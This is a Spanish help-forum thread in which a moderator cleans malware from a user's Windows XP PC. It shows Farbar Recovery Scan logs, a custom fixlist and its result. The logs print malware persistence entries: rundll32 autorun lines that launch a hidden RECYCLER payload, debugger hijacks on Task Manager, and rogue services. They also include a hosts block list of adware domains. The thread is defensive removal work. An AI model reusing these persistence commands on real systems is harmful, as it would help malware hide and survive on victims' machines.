      2010-05-07 19:35 - 2010-05-07 19:35 - 02143576 _____ () C:\Archivos de programa\Logitech\LWS\Webcam Software\QtCore4.dll
      2010-05-07 19:35 - 2010-05-07 19:35 - 07954776 _____ () C:\Archivos de programa\Logitech\LWS\Webcam Software\QtGui4.dll
      2010-05-07 19:36 - 2010-05-07 19:36 - 00340824 _____ () C:\Archivos de programa\Logitech\LWS\Webcam Software\QtXml4.dll
      2010-05-07 19:36 - 2010-05-07 19:36 - 00921944 _____ () C:\Archivos de programa\Logitech\LWS\Webcam Software\QtNetwork4.dll
      2010-05-07 19:37 - 2010-05-07 19:37 - 00027480 _____ () C:\Archivos de programa\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
      2010-05-07 19:37 - 2010-05-07 19:37 - 00126808 _____ () C:\Archivos de programa\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
      2010-05-07 19:34 - 2010-05-07 19:34 - 00168792 _____ () C:\Archivos de programa\Logitech\LWS\Webcam Software\CameraHelperShell.exe
      2010-11-12 10:23 - 2010-11-12 10:23 - 00330584 _____ () C:\Archivos de programa\Archivos comunes\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
      2010-05-07 19:43 - 2010-05-07 19:43 - 00651096 _____ () C:\Archivos de programa\Archivos comunes\Logishrd\LQCVFX\COCIManager.exe
      2010-03-16 13:22 - 2010-03-16 13:22 - 00014848 _____ () C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\AxInterop.WBOCXLib.dll
      2011-03-09 00:45 - 2011-03-09 00:45 - 00270336 _____ () C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
      1996-12-19 01:00 - 1996-12-19 01:00 - 00051984 _____ () C:\Archivos de programa\Microsoft Office\Office\OSA.EXE
      1996-12-19 01:00 - 1996-12-19 01:00 - 03774224 _____ () C:\Archivos de programa\Microsoft Office\Office\MSO97.DLL

      ==================== Alternate Data Streams (Whitelisted) =========

      (If an entry is included in the fixlist, only the ADS will be removed.)


      ==================== Safe Mode (Whitelisted) ===================

      (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)


      ==================== Association (Whitelisted) ===============

      (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


      ==================== Internet Explorer trusted/restricted ===============

      (If an entry is included in the fixlist, it will be removed from the registry.)


      ==================== Hosts content: ==========================

      (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

      2004-08-20 14:00 - 2017-04-19 01:40 - 00002009 ____A C:\WINDOWS\system32\Drivers\etc\hosts

      127.0.0.1 localhost
      0.0.0.0 serius.mwbsys.com0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
      0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
      0.0.0.0 media.opencandy.com
      0.0.0.0 cdn.opencandy.com
      0.0.0.0 tracking.opencandy.com
      0.0.0.0 api.opencandy.com
      0.0.0.0 api.recommendedsw.com
      0.0.0.0 installer.betterinstaller.com
      0.0.0.0 installer.filebulldog.com
      0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
      0.0.0.0 inno.bisrv.com
      0.0.0.0 nsis.bisrv.com
      0.0.0.0 cdn.file2desktop.com
      0.0.0.0 cdn.goateastcach.us
      0.0.0.0 cdn.guttastatdk.us
      0.0.0.0 cdn.inskinmedia.com
      0.0.0.0 cdn.insta.oibundles2.com
      0.0.0.0 cdn.insta.playbryte.com
      0.0.0.0 cdn.llogetfastcach.us
      0.0.0.0 cdn.montiera.com
      0.0.0.0 cdn.msdwnld.com
      0.0.0.0 cdn.mypcbackup.com
      0.0.0.0 cdn.ppdownload.com
      0.0.0.0 cdn.riceateastcach.us
      0.0.0.0 cdn.shyapotato.us
      0.0.0.0 cdn.solimba.com
      0.0.0.0 cdn.tuto4pc.com
      0.0.0.0 cdn.appround.biz
      0.0.0.0 cdn.bigspeedpro.com

      There are 5 more lines.


      ==================== Other Areas ============================

      (Currently there is no automatic fix for this section.)

      HKU\S-1-5-21-725345543-706699826-2147250837-1004\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\Microsoft\Wallpaper1.bmp
      DNS Servers: Media is not connected to internet.
      Windows Firewall is disabled.

      ==================== MSCONFIG/TASK MANAGER disabled items ==


      ==================== FirewallRules (Whitelisted) ===============

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\uTorrent\uTorrent.exe] => Enabled:µTorrent
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Opera\opera.exe] => Enabled:Opera Internet Browser
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Google\Chrome\Application\chrome.exe] => Enabled:Google Chrome
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Bonjour\mDNSResponder.exe] => Enabled:Servicio Bonjour
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\iTunes\iTunes.exe] => Enabled:iTunes
      StandardProfile\GloballyOpenPorts: [7545:TCP] => Enabled:bgejggkv

      ==================== Restore Points =========================

      14-04-2017 10:40:26 Punto de control del sistema
      17-04-2017 11:53:21 Punto de control del sistema
      18-04-2017 22:05:37 Punto de control del sistema
      20-04-2017 00:06:43 Punto de control del sistema
      20-04-2017 11:57:06 JRT Pre-Junkware Removal
      20-04-2017 12:58:03 JRT Pre-Junkware Removal

      ==================== Faulty Device Manager Devices =============

      Name: Audio Device on High Definition Audio Bus
      Description: Audio Device on High Definition Audio Bus
      Class Guid:
      Manufacturer:
      Service:
      Problem: : The drivers for this device are not installed. (Code 28)
      Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

      Name: Atheros AR8151 PCI-E Gigabit Ethernet Controller
      Description: Atheros AR8151 PCI-E Gigabit Ethernet Controller
      Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
      Manufacturer: Atheros
      Service: L1c
      Problem: : This device is disabled. (Code 22)
      Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


      ==================== Event log errors: =========================

      Application errors:
      ==================
      Error: (04/14/2017 10:41:26 AM) (Source: Userenv) (EventID: 1511) (User: MIGUEL)
      Description: Windows no puede encontrar el perfil local y está iniciando la sesión con un perfil temporal. Los cambios que se efectúen en este perfil se perderán cuando se cierre la sesión.

      Error: (04/14/2017 10:40:55 AM) (Source: Userenv) (EventID: 1515) (User: MIGUEL)
      Description: Windows ha hecho una copia de seguridad de este perfil de usuario. Windows intentará automáticamente usar el perfil de copia de seguridad la próxima vez que este usuario inicie su sesión.

      Error: (04/14/2017 10:40:55 AM) (Source: Userenv) (EventID: 1502) (User: MIGUEL)
      Description: Windows no puede cargar el perfil localmente almacenado. Las posibles causas de este error son derechos de seguridad insuficientes o un perfil local dañado. Si este problema persiste, póngase en contacto con el administrador de red.


      DETALLE - El proceso no tiene acceso al archivo porque está siendo utilizado por otro proceso.

      Error: (04/14/2017 10:40:24 AM) (Source: Userenv) (EventID: 1508) (User: NT AUTHORITY)
      Description: Windows no puede cargar el Registro. La mayoría de las veces esto es debido a una memoria insuficiente o a no tener los derechos de seguridad necesarios.


      DETLLE - El proceso no tiene acceso al archivo porque está siendo utilizado por otro proceso. para C:\Documents and Settings\MiguelTC\ntuser.dat

      Error: (04/13/2017 08:49:59 PM) (Source: Application Error) (EventID: 1000) (User: )
      Description: Aplicación con errores: isuspm.exe, versión: 3.0.100.1131, módulo con error: oleaut32.dll, versión 5.1.2600.2180, dirección de error 0x00004874.
      Procesando suceso específico de medio para [isuspm.exe!ws!]

      Error: (04/06/2017 09:50:42 PM) (Source: Application Error) (EventID: 1000) (User: )
      Description: Aplicación con errores: isuspm.exe, versión: 3.0.100.1131, módulo con error: oleaut32.dll, versión 5.1.2600.2180, dirección de error 0x00004874.
      Procesando suceso específico de medio para [isuspm.exe!ws!]

      Error: (03/30/2017 09:28:54 PM) (Source: Application Error) (EventID: 1000) (User: )
      Description: Aplicación con errores: isuspm.exe, versión: 3.0.100.1131, módulo con error: oleaut32.dll, versión 5.1.2600.2180, dirección de error 0x00004874.
      Procesando suceso específico de medio para [isuspm.exe!ws!]

      Error: (03/29/2017 11:52:09 PM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: Aplicación que no responde: SDScan.exe, versión 2.2.18.177, módulo que no responde hungapp, versión 0.0.0.0, dirección que no responde 0x00000000.

      Error: (03/29/2017 11:50:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: Aplicación que no responde: SDScan.exe, versión 2.2.18.177, módulo que no responde hungapp, versión 0.0.0.0, dirección que no responde 0x00000000.

      Error: (03/29/2017 12:22:55 AM) (Source: crypt32) (EventID: 8) (User: )
      Description: Error en la recuperación de actualización automática del número de secuencia de la lista raíz de terceros de: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> con el error: No se ha podido resolver el nombre de servidor o su dirección


      System errors:
      =============
      Error: (04/20/2017 12:55:28 PM) (Source: SideBySide) (EventID: 59) (User: )
      Description: Error en Generate Activation Context para C:\Archivos de programa\Canon\Solution Menu EX\MFC80U.DLL.
      Mensaje de error referencia: La operación se ha completado correctamente.
      .

      Error: (04/20/2017 12:55:28 PM) (Source: SideBySide) (EventID: 59) (User: )
      Description: Error en Resolve Partial Assembly para Microsoft.VC80.MFCLOC.
      Mensaje de error referencia: El ensamblaje referido no está instalado en su sistema.
      .

      Error: (04/20/2017 12:55:28 PM) (Source: SideBySide) (EventID: 32) (User: )
      Description: No se encontró el ensamblaje dependiente Microsoft.VC80.MFCLOC y el error final fue El ensamblaje referido no está instalado en su sistema.

      Error: (04/20/2017 12:55:27 PM) (Source: SideBySide) (EventID: 59) (User: )
      Description: Error en Generate Activation Context para C:\Archivos de programa\Canon\Solution Menu EX\MFC80U.DLL.
      Mensaje de error referencia: La operación se ha completado correctamente.
      .

      Error: (04/20/2017 12:55:27 PM) (Source: SideBySide) (EventID: 59) (User: )
      Description: Error en Resolve Partial Assembly para Microsoft.VC80.MFCLOC.
      Mensaje de error referencia: El ensamblaje referido no está instalado en su sistema.
      .

      Error: (04/20/2017 12:55:27 PM) (Source: SideBySide) (EventID: 32) (User: )
      Description: No se encontró el ensamblaje dependiente Microsoft.VC80.MFCLOC y el error final fue El ensamblaje referido no está instalado en su sistema.

      Error: (04/20/2017 12:55:27 PM) (Source: DCOM) (EventID: 10005) (User: MIGUEL)
      Description: DCOM ha obtenido un error "%%1058 = No se puede iniciar el servicio, porque está deshabilitado o porque no tiene dispositivos habilitados asociados a él." al intentar iniciar el servicio BITS con argumentos ""
      para ejecutar el servidor:
      {4991D34B-80A1-4291-83B6-3328366B9097}

      Error: (04/20/2017 12:55:22 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
      Description: El servicio Installer Shell terminó con el error:
      No se puede encontrar el módulo especificado.

      Error: (04/20/2017 12:55:22 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
      Description: El servicio Time Security terminó con el error:
      No se puede encontrar el módulo especificado.

      Error: (04/20/2017 12:55:18 PM) (Source: 0) (EventID: 55) (User: )
      Description: Event-ID 55


      ==================== Memory info ===========================

      Processor: Pentium(R) Dual-Core CPU E5700 @ 3.00GHz
      Percentage of memory in use: 13%
      Total physical RAM: 3583.04 MB
      Available physical RAM: 3096.7 MB
      Total Virtual: 5465.65 MB
      Available Virtual: 5073.25 MB

      ==================== Drives ================================

      Drive c: () (Fixed) (Total:1863.01 GB) (Free:1467.75 GB) NTFS ==>[drive with boot components (Windows XP)]
      Drive i: (Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:309.82 GB) NTFS

      ==================== MBR & Partition Table ==================

      ========================================================
      Disk: 0 (Size: 1863 GB) (Disk ID: 54E9C2EC)
      Partition 1: (Active) - (Size=1863 GB) - (Type=07 NTFS)

      ========================================================
      Disk: 1 (Size: 1863 GB) (Disk ID: C6F76104)
      Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

      ==================== End of Addition.txt ============================



      Nada, hotmail sigue igual lentísimo.

    8. #8
      Moderador Gral.
      Avatar de @Javier_HF
      Registrado
      jun 2006
      Ubicación
      Spain.
      Mensajes
      21.475

      Re: Hotmail me va lentísimo

      Bien...... y ahora sigue estos pasos, MUY Importante ~ Realiza una copia de seguridad del registro :


      • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona "Ejecutar como Administrador.")

      • Atención, ahora marca/selecciona únicamente la casilla "Create registry backup", las demás NO.

      • Pulsar en Run.

      Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

      Y ahora inicia tu equipo desde el >> Modo Seguro – con funciones de Red, de Windows.

      Con los demás programas cerrados ve a >> Inicio >> Ejecutar >> y escribe notepad.exe.

      Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad: (Se excluye la palabra código)

      Código:
      START
      CREATERESTOREPOINT:
      CLOSEPROCESSES:
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\ChromeHTML: -> <==== ATTENTION
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\uTorrent\uTorrent.exe] => Enabled:µTorrent
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Opera\opera.exe] => Enabled:Opera Internet Browser
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Google\Chrome\Application\chrome.exe] => Enabled:Google Chrome
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Bonjour\mDNSResponder.exe] => Enabled:Servicio Bonjour
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\iTunes\iTunes.exe] => Enabled:iTunes
      StandardProfile\GloballyOpenPorts: [7545:TCP] => Enabled:bgejggkv
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\Run: [ByteFence] => "C:\Archivos de programa\ByteFence\ByteFence.exe" /a
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {6e68a7ba-c417-11e5-a581-60e32738ff92} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {a68d7a2f-e3a8-11e5-a5c0-60e32738ff92} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {d524c8a7-1bc5-11e6-a612-5404a69b8782} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      IFEO\DisplaySwitch.exe: [Debugger]
      IFEO\taskmgr.exe: [Debugger]
      BootExecute: autocheck autochk * sdnclean.exe
      SearchScopes: HKLM -> DefaultScope value is missing
      CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
      CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
      S2 cgoql; C:\WINDOWS\system32\wdscqxkd.dll [X]
      S2 qdtrzxcz; C:\WINDOWS\system32\wdscqxkd.dll [X]
      S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
      S3 Secdrv; C:\WINDOWS\System32\DRIVERS\secdrv.sys [27440 2004-08-20] ()
      S4 aswSP; no ImagePath
      S4 IntelIde; no ImagePath
      S3 MAUSB; system32\DRIVERS\mausb.sys [X]
      S0 mgfa; System32\drivers\trif.sys [X]
      U1 WS2IFSL; no ImagePath
      NETSVC: cgoql -> C:\WINDOWS\system32\wdscqxkd.dll ==> No File
      NETSVC: qdtrzxcz -> C:\WINDOWS\system32\wdscqxkd.dll ==> No File
      2016-01-20 00:06 - 2016-01-20 03:26 - 0000100 _____ () C:\Documents and Settings\MiguelTC\Datos de programa\AVSDVDPlayer.m3u
      2016-01-06 03:29 - 2017-03-28 00:58 - 0082944 _____ () C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
      2017-04-13 16:14 - 2002-09-06 15:32 - 0205312 ____N () C:\Documents and Settings\MiguelTC\Configuración local\Temp\arctic-loop.exe
      2016-11-14 00:52 - 2016-11-14 00:53 - 33870608 _____ (Ellora Assets Corporation ) C:\Documents and Settings\MiguelTC\Configuración local\Temp\FreemakeVideoConverterFull.exe
      2011-05-31 05:47 - 2011-05-31 05:47 - 7510704 _____ (Google Inc.) C:\Documents and Settings\MiguelTC\Configuración local\Temp\GoogleToolbarInstaller_full_signed_7.0.1710.2246.exe
      2016-01-06 02:57 - 2010-02-05 17:46 - 0779600 ____N (CANON INC.) C:\Documents and Settings\MiguelTC\Configuración local\Temp\MSETUP4.EXE
      HOSTS:
      REMOVEPROXY:
      EMPTYTEMP:
      CMD: netsh winsock reset
      CMD: ipconfig /renew
      CMD: ipconfig /flushdns
      CMD: bitsadmin /reset /allusers
      END
      Guárdalo bajo el nombre de FIXLIST.TXT en el escritorio <<< Esto es muy importante.

      Nota: Es importante que la herramienta FRST.exe(Farbar Recovery Scanner Tool) y FIXLIST.TXT se encuentren en la misma ubicación (escritorio) o si no, no trabajara.
      ATENCION!!!! El siguiente Script de reparación fue hecho específicamente por un miembro del staff para este usuario, si tiene un problema similar por favor abra su propio tema para recibir ayuda personalizada. Usar Scripts de otros usuarios puede causar daños a su equipo



      • Ejecuta FRST.exe.(Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas "Ejecutar como Administrador")
      • Presionar el botón FIX y aguardar a que termine.
      • La Herramienta guardara el reporte de reparación en el escritorio (FIXLOG.TXT).


      Pegar el contenido de este fichero en tu próxima respuesta.

      Reiniciar el equipo y comprobar su funcionamiento en relación al problema planteado y comentarlo.

      Saludos.
      Quien no lo intenta no lo consigue | ;-)

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    9. #9
      Usuario Avatar de migueltc78
      Registrado
      abr 2017
      Ubicación
      España
      Mensajes
      8
      Fix result of Farbar Recovery Scan Tool (x86) Version: 19-04-2017
      Ran by MiguelTC (20-04-2017 1510) Run:1
      Running from C:\Documents and Settings\MiguelTC\Escritorio
      Loaded Profiles: MiguelTC (Available Profiles: MiguelTC)
      Boot Mode: Safe Mode (with Networking)

      ==============================================

      fixlist content:
      *****************
      START
      CREATERESTOREPOINT:
      CLOSEPROCESSES:
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\ChromeHTML: -> <==== ATTENTION
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\uTorrent\uTorrent.exe] => Enabled:µTorrent
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Opera\opera.exe] => Enabled:Opera Internet Browser
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Google\Chrome\Application\chrome.exe] => Enabled:Google Chrome
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\Bonjour\mDNSResponder.exe] => Enabled:Servicio Bonjour
      StandardProfile\AuthorizedApplications: [C:\Archivos de programa\iTunes\iTunes.exe] => Enabled:iTunes
      StandardProfile\GloballyOpenPorts: [7545:TCP] => Enabled:bgejggkv
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\Run: [ByteFence] => "C:\Archivos de programa\ByteFence\ByteFence.exe" /a
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {6e68a7ba-c417-11e5-a581-60e32738ff92} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {a68d7a2f-e3a8-11e5-a5c0-60e32738ff92} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {d524c8a7-1bc5-11e6-a612-5404a69b8782} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      IFEO\DisplaySwitch.exe: [Debugger]
      IFEO\taskmgr.exe: [Debugger]
      BootExecute: autocheck autochk * sdnclean.exe
      SearchScopes: HKLM -> DefaultScope value is missing
      CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
      CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
      S2 cgoql; C:\WINDOWS\system32\wdscqxkd.dll [X]
      S2 qdtrzxcz; C:\WINDOWS\system32\wdscqxkd.dll [X]
      S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
      S3 Secdrv; C:\WINDOWS\System32\DRIVERS\secdrv.sys [27440 2004-08-20] ()
      S4 aswSP; no ImagePath
      S4 IntelIde; no ImagePath
      S3 MAUSB; system32\DRIVERS\mausb.sys [X]
      S0 mgfa; System32\drivers\trif.sys [X]
      U1 WS2IFSL; no ImagePath
      NETSVC: cgoql -> C:\WINDOWS\system32\wdscqxkd.dll ==> No File
      NETSVC: qdtrzxcz -> C:\WINDOWS\system32\wdscqxkd.dll ==> No File
      2016-01-20 00:06 - 2016-01-20 03:26 - 0000100 _____ () C:\Documents and Settings\MiguelTC\Datos de programa\AVSDVDPlayer.m3u
      2016-01-06 03:29 - 2017-03-28 00:58 - 0082944 _____ () C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
      2017-04-13 16:14 - 2002-09-06 15:32 - 0205312 ____N () C:\Documents and Settings\MiguelTC\Configuración local\Temp\arctic-loop.exe
      2016-11-14 00:52 - 2016-11-14 00:53 - 33870608 _____ (Ellora Assets Corporation ) C:\Documents and Settings\MiguelTC\Configuración local\Temp\FreemakeVideoConverterFull.exe
      2011-05-31 05:47 - 2011-05-31 05:47 - 7510704 _____ (Google Inc.) C:\Documents and Settings\MiguelTC\Configuración local\Temp\GoogleToolbarInstaller_full_signed_7.0.1710.2246.exe
      2016-01-06 02:57 - 2010-02-05 17:46 - 0779600 ____N (CANON INC.) C:\Documents and Settings\MiguelTC\Configuración local\Temp\MSETUP4.EXE
      HOSTS:
      REMOVEPROXY:
      EMPTYTEMP:
      CMD: netsh winsock reset
      CMD: ipconfig /renew
      CMD: ipconfig /flushdns
      CMD: bitsadmin /reset /allusers
      END
      *****************

      Error: Restore point can only be created in normal mode.
      Processes closed successfully.
      HKU\S-1-5-21-725345543-706699826-2147250837-1004_Classes\ChromeHTML => key removed successfully.
      HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\C:\Archivos de programa\uTorrent\uTorrent.exe => value removed successfully.
      HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\C:\Archivos de programa\Opera\opera.exe => value removed successfully.
      HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\C:\Archivos de programa\Google\Chrome\Application\chrome.exe => value removed successfully.
      HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\C:\Archivos de programa\Bonjour\mDNSResponder.exe => value removed successfully.
      HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\C:\Archivos de programa\iTunes\iTunes.exe => value removed successfully.
      HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\\7545:TCP => value removed successfully.
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\Software\Microsoft\Windows\CurrentVersion\Run\\ByteFence => value removed successfully.
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6e68a7ba-c417-11e5-a581-60e32738ff92} => key removed successfully.
      HKCR\CLSID\{6e68a7ba-c417-11e5-a581-60e32738ff92} => key not found.
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a68d7a2f-e3a8-11e5-a5c0-60e32738ff92} => key removed successfully.
      HKCR\CLSID\{a68d7a2f-e3a8-11e5-a5c0-60e32738ff92} => key not found.
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d524c8a7-1bc5-11e6-a612-5404a69b8782} => key removed successfully.
      HKCR\CLSID\{d524c8a7-1bc5-11e6-a612-5404a69b8782} => key not found.
      HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => key removed successfully.
      HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => key removed successfully.
      HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => value restored successfully
      HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
      Chrome DefaultSearchURL => removed successfully.
      Chrome DefaultSuggestURL => removed successfully.
      HKLM\System\CurrentControlSet\Services\cgoql => key removed successfully.
      cgoql => service removed successfully.
      HKLM\System\CurrentControlSet\Services\qdtrzxcz => key removed successfully.
      qdtrzxcz => service removed successfully.
      HKLM\System\CurrentControlSet\Services\rpcapd => key removed successfully.
      rpcapd => service removed successfully.
      HKLM\System\CurrentControlSet\Services\Secdrv => key removed successfully.
      Secdrv => service removed successfully.
      HKLM\System\CurrentControlSet\Services\aswSP => key removed successfully.
      aswSP => service removed successfully.
      HKLM\System\CurrentControlSet\Services\IntelIde => key removed successfully.
      IntelIde => service removed successfully.
      HKLM\System\CurrentControlSet\Services\MAUSB => key removed successfully.
      MAUSB => service removed successfully.
      HKLM\System\CurrentControlSet\Services\mgfa => key removed successfully.
      mgfa => service removed successfully.
      HKLM\System\CurrentControlSet\Services\WS2IFSL => key removed successfully.
      WS2IFSL => service removed successfully.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\\netsvcs cgoql => value removed successfully.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\\netsvcs qdtrzxcz => value removed successfully.
      C:\Documents and Settings\MiguelTC\Datos de programa\AVSDVDPlayer.m3u => moved successfully
      C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini => moved successfully
      C:\Documents and Settings\MiguelTC\Configuración local\Temp\arctic-loop.exe => moved successfully
      C:\Documents and Settings\MiguelTC\Configuración local\Temp\FreemakeVideoConverterFull.exe => moved successfully
      C:\Documents and Settings\MiguelTC\Configuración local\Temp\GoogleToolbarInstaller_full_signed_7.0.1710.2246.exe => moved successfully
      C:\Documents and Settings\MiguelTC\Configuración local\Temp\MSETUP4.EXE => moved successfully
      C:\Windows\System32\Drivers\etc\hosts => moved successfully
      Hosts restored successfully.

      ========= RemoveProxy: =========

      HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully.
      HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully.
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully.
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully.


      ========= End of RemoveProxy: =========


      ========= netsh winsock reset =========


      Restablecer satisfactoriamente el cat*logo Winsock.
      Debe reiniciar el equipo para finalizar el restablecimiento.


      ========= End of CMD: =========


      ========= ipconfig /renew =========



      Configuración IP de Windows





      Adaptador Ethernet Conexiones de red inalámbricas 3 :



      Sufijo de conexión específica DNS :

      Dirección IP. . . . . . . . . . . : 192.168.1.100

      Máscara de subred . . . . . . . . : 255.255.255.0

      Puerta de enlace predeterminada : 192.168.1.1


      ========= End of CMD: =========


      ========= ipconfig /flushdns =========



      Configuración IP de Windows



      Se vació con éxito la caché de resolución de DNS.


      ========= End of CMD: =========


      ========= bitsadmin /reset /allusers =========

      "bitsadmin" no se reconoce como un comando interno o externo,
      programa o archivo por lotes ejecutable.

      ========= End of CMD: =========


      =========== EmptyTemp: ==========

      BITS transfer queue => 0 B
      DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 9572 B
      Java, Flash, Steam htmlcache => 1191 B
      Windows/system/dllcache/drivers => 19420960 B
      Edge => 0 B
      Chrome => 793978789 B
      Firefox => 0 B
      Opera => 0 B

      Temp, IE cache, history, cookies, recent:
